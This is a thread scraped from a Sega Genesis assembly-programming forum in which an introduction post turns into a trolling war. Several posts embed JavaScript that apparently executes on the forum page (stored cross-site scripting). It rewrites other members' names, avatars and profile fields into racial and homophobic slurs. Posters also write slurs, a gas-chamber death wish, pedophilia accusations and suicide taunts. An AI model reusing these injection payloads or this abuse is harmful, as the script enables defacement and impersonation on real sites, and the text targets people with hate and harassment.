ASM to Sega Genesis Platform

Would you like to react to this message? Create an account in a few clicks or log in to continue.
ASM to Sega Genesis Platform

All about assembly programming in the Sega Genesis console.


+7
CoolSpot.
kIkKo.MaN
Chad
Kekistani
Squidward Tenticals
Ralakimus1
Monika
11 posters

    Heya, Real Life Humans!

    Monika
    Monika


    Mensagens : 6
    Data de inscrição : 2021-09-14
    Localização : Japan
    Current Project : Seeking after YOU!

    Heya, Real Life Humans! Empty Heya, Real Life Humans!

    Post  Monika Tue Sep 14, 2021 1:25 pm

    Heya!~

    uwu
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Ralakimus1 Tue Sep 14, 2021 3:57 pm

    can u hack squidward's account and prevent him from logging back in Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil
    Monika
    Monika


    Mensagens : 6
    Data de inscrição : 2021-09-14
    Localização : Japan
    Current Project : Seeking after YOU!

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Monika Tue Sep 14, 2021 4:28 pm

    Sure! Anything for you dearie!~
    Squidward Tenticals
    Squidward Tenticals


    Mensagens : 284
    Data de inscrição : 2021-04-02

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Squidward Tenticals Wed Sep 15, 2021 7:34 am

    NO!

    Mad
    Kekistani
    Kekistani


    Mensagens : 32
    Data de inscrição : 2021-09-09
    Localização : Kekistan
    Current Project : Praising KEK

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Kekistani Wed Sep 15, 2021 3:23 pm

    I am a member of Anonymous. I could hack Monika's account!
    Chad
    Chad


    Mensagens : 7
    Data de inscrição : 2021-09-09
    Localização : With hot babes
    Current Project : Attracting women

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Chad Wed Sep 15, 2021 6:00 pm

    Heya babe!

    Let's ditch this joint together!

    I can let you in on some of my secrets!~

    Heya, Real Life Humans! 1f60f
    Kekistani
    Kekistani


    Mensagens : 32
    Data de inscrição : 2021-09-09
    Localização : Kekistan
    Current Project : Praising KEK

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Kekistani Wed Sep 15, 2021 10:14 pm

    Shut the fuck up. You and Monigger should go die in a gas chamber, WWII style.
    Kekistani
    Kekistani


    Mensagens : 32
    Data de inscrição : 2021-09-09
    Localização : Kekistan
    Current Project : Praising KEK

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Kekistani Wed Sep 15, 2021 10:25 pm

    HAHAHAHAHA HACKED!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! pirat pirat pirat pirat pirat pirat pirat pirat cheers cheers cheers cheers



    document.body.innerHTML = document.body.innerHTML.replaceAll("Monika", "Monigger").replaceAll("2img.net/u/2615/12/81/31/avatars/153-29.jpg", "i.imgur.com/KHqd3a0.png").replaceAll("Seeking after YOU!", "Being a niggerfaggot!").replaceAll("Japan", "Africa").replaceAll("uwu", "I'M A RETARDED NIGGERFAGGOT");
    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 2:34 pm



    I aM MotHeR FucKeR Me tRoX, I aM a lOsEr PeDo aNd I LiEk ChIlD P0Rn CuZ I Am GaY, I nEeD 2 KiLl MySeLf CuZ nOoNe LiKeS Me!!!!

    EaT ShIt yOu LoSeR PeDo

    Very Happy Very Happy:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D
    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 2:35 pm



    EaT ShIt yOu LoSeR PeDo

    Very Happy Very Happy:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D
    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 2:38 pm

    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 2:42 pm



    EAT SHIT U FUCKER

    bounce

    CoolSpot. and Monika like this post

    Monika
    Monika


    Mensagens : 6
    Data de inscrição : 2021-09-14
    Localização : Japan
    Current Project : Seeking after YOU!

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Monika Thu Sep 16, 2021 4:05 pm

    Squidward Tenticals wrote:NO!
    Mad

    We'll
    just have to wait and see Squiddy!~

    Chad wrote:Heya babe!

    Let's ditch this joint together!

    I can let you in on some of my secrets!~

    Heya, Real Life Humans! 1f60f
    Eww, thanks but no thanks!
    I'm only interested in REAL people, not fake catfishers!
    Chad
    Chad


    Mensagens : 7
    Data de inscrição : 2021-09-09
    Localização : With hot babes
    Current Project : Attracting women

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Chad Thu Sep 16, 2021 4:09 pm

    Monika wrote:
    Squidward Tenticals wrote:NO!
    Mad

    We'll
    just have to wait and see Squiddy!~

    Chad wrote:Heya babe!

    Let's ditch this joint together!

    I can let you in on some of my secrets!~

    Heya, Real Life Humans! 1f60f
    Eww, thanks but no thanks!
    I'm only interested in REAL people, not fake catfishers!

    No babe I'm a REAL PERSON! I can prove it!!!

    Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad Crying or Very sad
    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 6:10 pm




    document.body.innerHTML = document.body.innerHTML.replaceAll("Kekistani", "Loser Pedo").replaceAll("https://2img.net/u/2615/12/81/31/avatars/151-82.jpg", "https://i.kymcdn.com/photos/images/newsfeed/001/309/016/d27.png").replaceAll("Praising KEK", "Sucking on Squidward's dick!").replaceAll("Kekistan", "Hell").replaceAll("HAHAHAHAHA HACKED!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!", "I aM MotHeR FucKeR Me tRoX, I aM a lOsEr PeDo aNd I LiEk ChIlD P0Rn CuZ I Am GaY, I nEeD 2 KiLl MySeLf CuZ nOoNe LiKeS Me!!!!");


    Kekistani wrote:I aM MotHeR FucKeR Me tRoX, I aM a lOsEr PeDo aNd I LiEk ChIlD P0Rn CuZ I Am GaY, I nEeD 2 KiLl MySeLf CuZ nOoNe LiKeS Me!!!!

    Eat shit again loser!

    drunken
    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 6:14 pm




    document.body.innerHTML = document.body.innerHTML.replaceAll("Monigger", "Monika").replaceAll("i.imgur.com/KHqd3a0.png", "2img.net/u/2615/12/81/31/avatars/153-29.jpg").replaceAll("Being a niggerfaggot!", "Avoiding crepy pedos").replaceAll("Africa", "Japan").replaceAll("I'M A RETARDED NIGGERFAGGOT", "uwu");


    Fixed Again =U
    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 6:15 pm

    Heya, Real Life Humans! Javascript';c.text=s.innerText;d.body.appendChild(c);}}};d.body


    document.body.innerHTML = document.body.innerHTML.replaceAll("Monika", "Monika").replaceAll("2img.net/u/2615/12/81/31/avatars/153-29.jpg", "2img.net/u/2615/12/81/31/avatars/153-29.jpg").replaceAll("Avoiding crepy pedos", "Avoiding crepy pedos").replaceAll("Japan", "Japan").replaceAll("uwu", "uwu");


    Fixed Again =U
    Kekistani
    Kekistani


    Mensagens : 32
    Data de inscrição : 2021-09-09
    Localização : Kekistan
    Current Project : Praising KEK

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Kekistani Thu Sep 16, 2021 6:17 pm

    GRRRRRRRR FUCK YOU!!!!!!!!!!! EAT SHIT AND DIE YOU NIGGER

    Squidward Tenticals likes this post

    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 6:19 pm



    Alight forget this....
    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 6:20 pm

    HAHAHAHAHAHA YOU LOSE BITCH!!!!!


    cyclops cyclops cyclops cyclops cyclops cyclops cyclops cyclops cyclops cyclops
    CoolSpot.
    CoolSpot.


    Mensagens : 365
    Data de inscrição : 2014-06-03

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  CoolSpot. Thu Sep 16, 2021 6:22 pm

    WHAT IS GOING ON??????


    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 6:22 pm

    Nothing important
    CoolSpot.
    CoolSpot.


    Mensagens : 365
    Data de inscrição : 2014-06-03

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  CoolSpot. Thu Sep 16, 2021 6:23 pm

    Ok then
    avatar
    kIkKo.MaN


    Mensagens : 85
    Data de inscrição : 2013-09-16

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  kIkKo.MaN Thu Sep 16, 2021 6:24 pm

    Yup
    CoolSpot.
    CoolSpot.


    Mensagens : 365
    Data de inscrição : 2014-06-03

    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  CoolSpot. Thu Sep 16, 2021 6:24 pm

    nice

    Sponsored content


    Heya, Real Life Humans! Empty Re: Heya, Real Life Humans!

    Post  Sponsored content


      Current date/time is Thu Mar 28, 2024 10:57 pm